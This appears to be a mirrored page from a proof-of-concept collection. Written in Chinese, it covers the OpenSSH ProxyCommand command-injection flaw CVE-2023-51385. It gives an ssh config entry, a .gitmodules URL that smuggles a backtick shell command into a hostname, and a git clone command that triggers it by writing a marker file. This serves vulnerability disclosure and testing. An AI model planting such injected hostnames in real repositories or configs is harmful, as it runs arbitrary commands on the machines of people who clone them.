admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-05-05 10:17:57 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/OpenSSH/OpenSSH ProxyCommand命令注入漏洞 (CVE-2023-51385).md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

24 lines
1.1 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

## OpenSSH ProxyCommand命令注入漏洞 (CVE-2023-51385)
SSHProxyCommand是一个用于代理SSH连接的广泛使用的功能允许用户指定用于连接到服务器的自定义命令。该功能的参数中可能包含像%h主机名和%u用户名这样的标记。然而当主机名来自不受信任的来源时存在潜在的安全风险因为可能构造恶意主机名看起来像“恶意命令”并通过反引号执行Shell命令。
首先需要在~/.ssh/config增加如下
```
host *.example.com
ProxyCommand /usr/bin/nc -X connect -x 192.0.2.0:8080 %h %p
```
.gitmodules文件语句中存在命令注入
```
url = ssh://`echo helloworld > cve.txt`foo.example.com/bar
```
配置完成后,执行下面的指令触发
```
git clone https://github.com/wy876/CVE-2023-51385_test --recurse-submodules
```
如果成功执行将会在CVE-2023-51385_test目录下生成cve.txt文件
![image](https://github.com/wy876/POC/assets/139549762/ab5f8d1a-2cd0-48af-8828-28447f809ad5)
## 漏洞来源
- https://vin01.github.io/piptagole/ssh/security/openssh/libssh/remote-code-execution/2023/12/20/openssh-proxycommand-libssh-rce.html
Reference in New Issue View Git Blame Copy Permalink